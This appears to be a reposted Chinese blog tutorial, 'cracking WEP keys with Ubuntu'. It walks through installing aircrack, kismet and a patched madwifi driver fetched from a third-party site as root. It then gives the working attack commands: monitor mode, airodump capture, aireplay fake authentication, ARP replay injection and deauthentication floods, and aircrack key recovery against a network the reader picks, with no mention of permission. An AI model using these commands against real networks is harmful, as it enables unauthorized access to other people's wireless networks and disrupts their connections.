歡迎您光臨本站 註冊首頁

用Ubuntu破解WEP密鑰

←手機掃碼閱讀     火星人 @ 2014-03-26 , reply:0

  看了這篇文章,任何人都可以安裝和運行Linux,並破解WEP密鑰。我一共花了整整兩天,並閱讀了大量資料才做出這個東西,現在拿出來和大家分享。我不是Linux方面的專家。你所需要的就是一個有無線網卡的舊筆記本和一份Ubuntu Linux的拷貝,這是目前最流行並且最易於安裝的Linux發行版本之一。

  第一步,很顯然,是安裝Ubuntu。從CD啟動,按指示操作,非常簡單。要注意的是,接下來的每一步都要有序進行,否則就達不到預期目標。

  下一步是安裝其它程序。首先要保證你的本本可以聯網。安裝其它程序,需要打開一個終端窗口,並鍵入如下代碼:

  sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

  sudo gedit /etc/apt/sources.list

  在編輯器中,用以下代碼代替其它東西:

  ## Add comments (##) in front of any line to remove it from being checked.
  ## Use the following sources.list at your own risk.

  deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  ## MAJOR BUG FIX UPDATES produced after the final release

  deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  ## UBUNTU SECURITY UPDATES

  deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free

  deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free



    保存文件、退出編輯器。敲入如下命令:

sudo apt-get update


    現在我們可以安裝後續將會用到的包了:

  sudo apt-get install build-essential

  sudo apt-get install aircrack

  sudo apt-get install kismet

  sudo apt-get install airsnort

  sudo apt-get install linux-source

  sudo apt-get install linux-headers

  sudo apt-get install sharutils



  接下來你應該更新整個系統,方法是,進入系統菜單——>Administration——>Update Manager。單擊「Check」,開始安裝更新。然後重啟系統。完成後,為Madwifi驅動打補丁。

  這個地方可能會有點複雜。我的無線網卡(Linksys WPC55AG)用的是Atheros驅動,我需要對之打補丁。如果你的驅動和我的不同,你需要研究一下是否需要為驅動打補丁,是否甚至可以和Aircrack套件協同工作。Aircrack-ng.org的論壇是一個用來測試的好地方,當然了,google search也是的。如果你的網卡也是Atheros的,我們稱之為ath0,那麼,在終端窗口敲入iwconfig,會出現一行字元,顯示乙太網控制器是Atheros Communications……

  我們來打補丁。當發現硬碟舊的驅動時,會暫時讓你的無線網卡無法工作。先進入/usr/src目錄,下載新的驅動、刪掉老驅動,然後安裝新驅動,並打上補丁。你可以把以下代碼拷貝粘貼到終端:

  sudo -i
  cd /usr/src

  wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz

  wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

  ifconfig ath0 down

  rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

  find /lib/modules -name 『ath*』 -exec rm -v {} \;

  find /lib/modules -name 『wlan*』 -exec rm -v {} \;

  tar zxvf madwifi-cvs-20051025.tar.gz

  cd madwifi

  patch -Np1 -i ../madwifi-cvs-20051025.patch

  make && make install

  modprobe ath_pci



   如果你用的是Atheros驅動,接下來我們舊需要配置kismet了。如果你用的是其它驅動,就必須看你所使用的語法。首先進入Kismet配置,然後改變源代碼行。

sudo gedit /etc/kismet/kismet.conf


  把以「source=」打頭的代碼行變為「source=madwifi_ag,ath0,madwifi」,重啟計算機。重啟后你將可以通過無線網卡訪問英特網。

  現在我們開始破解。打開一個終端窗口,進入監控模式,運行ksimet。

  sudo airmon start ath0

  sudo kismet



  找到你想要破解的無線網路,需要注意其ESSID和通道,然後敲Ctrl-C退出。

  接下來運行airodump。

sudo airodump ath0 filename channel# 1


  文件名隨你意,可以作為ivs文件存在你的home目錄下,或者存在你運行命令的任何目錄下。

  從airodump中拷貝無線網路的bssid,具體做法是選中后敲Shift+Ctrl+C。打開一個新的終端窗口,以便我們可以運行aireplay,開始注入數據包,導致數據量上升。我們想要airodump中的數據欄顯示在10萬到40萬之間。數據包越多,aircrack就可以越快地找到WEP密鑰。如果WEP密鑰是128位的,我們可能需要多達100萬個數據包。

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0


  應該把網路和無線連接聯繫起來。如果總是超時,你需要離無線路由器更近,或通過「sudo iwconfig ath0 rate 1M」改變介面速率。

  接下來我們想開始注入數據包。

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0


  起初只是讀取數據包,並且報告0個ARP請求、發送0個數據包。只需要等一兩分鐘,就會開始大量發送數據包了。如果返迴文本,並報告說已經被削弱了,那麼敲Ctrl+C,重新運行命令。可以通過敲入下面這條命令來加速任何事情:

sudo aireplay -0 ath0 -a BSSID ath0


  否則就只坐等事情慢慢進行吧。隨著數據包開始被發送,Airodump中的數據欄就開始飆升。等到收到了預期數量的數據包,打開一個新的終端窗口,運行aircrack。

sudo aircrack filename.ivs


  一分鐘后,aircrack應該返回WEP密鑰。如果沒有返回,那就繼續回收更多的數據包。

  這做起來一點都不費勁,但可以起作用。

[火星人 ] 用Ubuntu破解WEP密鑰已經有479次圍觀

http://coctec.com/docs/linux/show-post-181154.html